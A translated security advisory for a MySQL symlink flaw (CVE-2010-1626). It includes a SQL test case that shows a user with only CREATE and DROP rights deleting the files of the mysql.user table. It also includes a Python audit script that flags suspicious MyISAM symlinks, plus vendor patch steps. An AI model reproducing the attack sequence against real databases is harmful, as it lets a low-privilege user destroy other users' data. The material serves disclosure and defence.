MySQL DROP TABLE Command Symlink Attack Vulnerability

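Published: 2010-04-06
Updated: 2010-05-27

Affected systems:
MySQL AB MySQL < 5.1.46
Unaffected systems:
MySQL AB MySQL 5.1.46
Description:
BUGTRAQ  ID: 40257
CVE(CAN) ID: CVE-2010-1626

MySQL is a very widely used open-source relational database system, with versions available for a variety of platforms.

MySQL mishandles symbolic links for tables created with the DATA DIRECTORY and INDEX DIRECTORY options of the CREATE TABLE statement. A user who has CREATE and DROP privileges on tables and shell access to the database server can exploit this flaw to delete the data and index files of tables that other database users created with the MyISAM storage engine.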

<*Source: Ingo Strüwing (ingo@mysql.com)
  
  Links: http://bugs.mysql.com/bug.php?id=40980
         http://secunia.com/advisories/39454/
         https://www.redhat.com/support/errata/RHSA-2010-0442.html
         http://www.debian.org/security/2010/dsa-2057
*>

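Test method:

Warning

The following procedure (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!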

#
# Test #2 - Drop mysql.user with CREATE|DROP privileges on another DB.
#
CREATE USER 'mysql_user1';
#
# Create a database for mysql_user1 user's tables.
#
CREATE DATABASE mysql_db1;
#
# Grant mysql_user1 to create and drop tables in mysql_db1.
#
GRANT CREATE, DROP ON mysql_db1.* TO 'mysql_user1';
#
# Show which users we have in the table mysql.user.
#
SELECT User FROM mysql.user;
User
mysql_user1
root
root
root
#
# Connection con1 - mysql_user1
#
# Make a directory somewhere, for example in MYSQL_TMP_DIR.
#
# Create table mysql_db1.user, with its files in.
#
CREATE TABLE mysql_db1.user (c1 INT) ENGINE=MyISAM
DATA DIRECTORY='MYSQL_TMP_DIR/bug39277'
      INDEX DIRECTORY='MYSQL_TMP_DIR/bug39277';
#
# Remove the table files and the directory.
#
# Make a symlink from 'mysql' database to MYSQL_TMP_DIR/.
#
# Drop table mysql_db1.mysql with the files from mysql.user.
DROP TABLE mysql_db1.user;
#
# Connection default - root
#
# Show which users we have in table mysql.user.
# This does work as the table is still open in the table cache.
#
SELECT User FROM mysql.user;
User
mysql_user1
root
root
root
#
# Close table mysql.user.
#
FLUSH TABLE mysql.user;
#
# Show which users we have in the table mysql.user. Bummer!
#
SELECT User FROM mysql.user;
ERROR HY000: Can't find file: 'user' (errno: 2)
#
# Due to missing table files, we cannot drop the user any more.
#
DROP USER 'mysql_user1';
ERROR HY000: Can't find file: 'user' (errno: 2)
#
# Cleanup.
#
DROP DATABASE mysql_db1;
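
Added example, not part of the original advisory or of MySQL's code: a Python audit that walks a MyISAM data directory and reports symlinked .MYD/.MYI files whose targets resolve back into the data directory, are dangling, or pass through another symlink, which is the on-disk state the test case above produces before DROP TABLE. The function names and the directory tree built by build_constructed_layout are assumptions constructed for illustration.

```python
import os
import tempfile

MYISAM_EXT = (".MYD", ".MYI")  # MyISAM data and index files

def audit_myisam_symlinks(datadir):
    """Return sorted (relative link path, finding) pairs for risky MyISAM symlinks."""
    datadir = os.path.realpath(datadir)
    findings = []
    for db in sorted(os.listdir(datadir)):
        db_path = os.path.join(datadir, db)
        if not os.path.isdir(db_path):
            continue
        for name in sorted(os.listdir(db_path)):
            link = os.path.join(db_path, name)
            if not (name.endswith(MYISAM_EXT) and os.path.islink(link)):
                continue
            rel = os.path.join(db, name)
            # Target as written in the link vs. where it ends up after
            # every symlink on the way has been followed.
            literal = os.path.normpath(os.path.join(db_path, os.readlink(link)))
            resolved = os.path.realpath(link)
            if os.path.commonpath([resolved, datadir]) == datadir:
                findings.append((rel, "resolves into the data directory"))
            elif not os.path.exists(resolved):
                findings.append((rel, "dangling target"))
            elif resolved != literal:
                findings.append((rel, "target path passes through another symlink"))
    return findings

def build_constructed_layout(root):
    """Constructed sample tree: one benign, one redirected, one dangling link."""
    data, tmp = os.path.join(root, "data"), os.path.join(root, "tmp")
    for d in ("data/mysql", "data/mysql_db1", "tmp/ext"):
        os.makedirs(os.path.join(root, d))
    for f in ("data/mysql/user.MYD", "tmp/ext/ok.MYD"):
        open(os.path.join(root, f), "w").close()
    # Directory the table was created in, later replaced by a symlink.
    os.symlink(os.path.join(data, "mysql"), os.path.join(tmp, "bug39277"))
    os.symlink(os.path.join(tmp, "bug39277", "user.MYD"), os.path.join(data, "mysql_db1", "user.MYD"))
    os.symlink(os.path.join(tmp, "ext", "ok.MYD"), os.path.join(data, "mysql_db1", "ok.MYD"))
    os.symlink(os.path.join(tmp, "gone", "t.MYI"), os.path.join(data, "mysql_db1", "t.MYI"))
    return data

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        for rel, finding in audit_myisam_symlinks(build_constructed_layout(os.path.realpath(root))):
            print(rel, "->", finding)
```

The third finding is a heuristic: it also fires when the storage path legitimately crosses a symlinked mount point, so review those hits rather than treating them as confirmed tampering.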

Recommendations:
Vendor patches:

Debian
------
Debian has released a security advisory (DSA-2057-1) and corresponding patches for this issue:
DSA-2057-1: mysql-dfsg-5.0: Multiple vulnerabilities
Link: http://www.debian.org/security/2010/dsa-2057

Patch downloads:

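Patch installation:

1. Installing the patch packages manually:

  First, download the patch package with the following command:
  # wget url  (url is the patch download link)

  Then install the patch with the following command:
  # dpkg -i file.deb (file is the name of the corresponding patch package)

2. Installing the patch packages automatically with apt-get:

   First, update the internal database with the following command:
   # apt-get update

   Then install the updated packages with the following command:
   # apt-get upgrade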

MySQL AB
--------
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:

http://lists.mysql.com/commits/104639?f=plain

RedHat
------
RedHat has released a security advisory (RHSA-2010:0442-01) and corresponding patches for this issue:
RHSA-2010:0442-01: Important: mysql security update
Link: https://www.redhat.com/support/errata/RHSA-2010-0442.html

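This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.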